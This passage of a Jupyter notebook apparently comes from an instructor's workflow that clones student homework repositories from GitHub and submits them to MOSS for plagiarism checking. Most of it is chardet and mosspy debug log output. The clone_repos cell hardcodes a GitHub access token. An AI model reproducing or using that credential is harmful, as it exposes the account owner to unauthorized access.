0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match213-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match213-top.html\nDEBUG:chardet.charsetprober:Big5 not 
active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5221403739300993\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match214-top.html\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.549982692463897\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match214-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match214-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match215-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match215-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match215-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 31478\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24642\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 31465\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error 
at byte 24655\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match217-top.html\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 31478\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 31465\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 31465\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24643\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 31466\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24642\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 31465\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5440136708076909\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:TIS-620 Thai 
confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.544952431142531\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5321814954628881\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match217-0.html\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match217-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian 
confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.528035967388954\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match218-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match218-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match218-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match216-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match216-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match216-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match223-top.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5464387129190916\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 
0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match223-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match223-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match219-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match219-0.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19405\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match219-1.html\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19392\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19405\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19392\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19392\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19393\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19392\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5297635729864526\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match221-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match221-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match221-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19405\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 23864\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21276\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19392\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit 
error at byte 21289\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 23851\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19405\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 23864\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19392\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 23851\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21277\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19392\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21276\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 23851\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19393\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 23852\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19392\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 23851\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5356196010713635\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 
0.0
[repetitive chardet.charsetprober encoding-detection DEBUG output omitted]
DEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match224-top.html
[further "DEBUG:root:Processing URL" lines for the match220 through match249 result pages (-top, -0, -1 variants) omitted]
DEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match249-1.html
DEBUG:root:Waiting for all threads to complete
[remaining chardet.charsetprober DEBUG output omitted]
= 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5588585707638614\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25590\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25577\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25590\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25577\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25577\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25578\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25577\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5415272097897004\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\n"
],
[
"import logging",
"_____no_output_____"
],
[
"logging.DEBUG",
"_____no_output_____"
],
[
"logging.WARNING",
"_____no_output_____"
],
[
"# TODO: use absolute paths everywhere...\n\ndef clone_repos(pattern=\"homework-1\", store_at=\"/tmp/homework\"):\n if not os.path.exists(store_at):\n os.mkdir(store_at)\n os.chdir(store_at)\n g = Github(\"5c103d46120d27b0fac5d9d1b9df0b91c77c5d42\")\n org = g.get_organization(\"applied-ml-spring-18\")\n repos = org.get_repos()\n these = [repo for repo in repos_list if pattern in repo.full_name]\n for repo in tqdm.tqdm(these):\n #print(repo.ssh_url)\n if not os.path.exists(repo.name):\n os.system(\"git clone {}\".format(repo.ssh_url))\n for repo in hw4:\n try:\n l = listdir(repo.name)\n except FileNotFoundError:\n #print(repo.name)\n continue\n if len(l) < 2:\n # has .git folder\n shutil.rmtree(repo.name)\n return repos\n\ndef convert_notebooks():\n notebooks = glob(\"*/*.ipynb\")\n for notebook in tqdm.tqdm(notebooks):\n #print(notebook)\n if not os.path.exists(notebook.replace(\"ipynb\", \"py\")):\n os.system(\"jupyter-nbconvert {} --to script\".format(shlex.quote(notebook)))\n \ndef submit_moss():\n import mosspy\n\n userid = 321\n\n m = mosspy.Moss(userid, \"python\")\n m.setDirectoryMode(1)\n\n m.addFilesByWildcard(\"*/*.py\")\n m.addFilesByWildcard(\"*/*/*.py\")\n\n\n url = m.send() # Submission Report URL\n\n print (\"Report Url: \" + url)\n return m, url",
"_____no_output_____"
],
[
"clone_repos(pattern=\"homework-3\", store_at=\"/home/andy/Dropbox/columbia_safe/applied_machine_learning_spring_2018/submissions_hw3/\")",
"100%|██████████| 78/78 [00:00<00:00, 72267.66it/s]\n"
],
[
"convert_notebooks()",
"100%|██████████| 124/124 [03:47<00:00, 1.83s/it]\n"
],
[
"m = submit_moss()",
"Report Url: http://moss.stanford.edu/results/30189410\n"
],
[
"mosspy.download_report(url, \"hw3_report/\", connections=8, log_level=20)",
"_____no_output_____"
],
[
"clone_repos(pattern=\"homework-2\", store_at=\"/home/andy/Dropbox/columbia_safe/applied_machine_learning_spring_2018/submissions_hw2/\")",
"100%|██████████| 135/135 [01:44<00:00, 1.30it/s]\n"
],
[
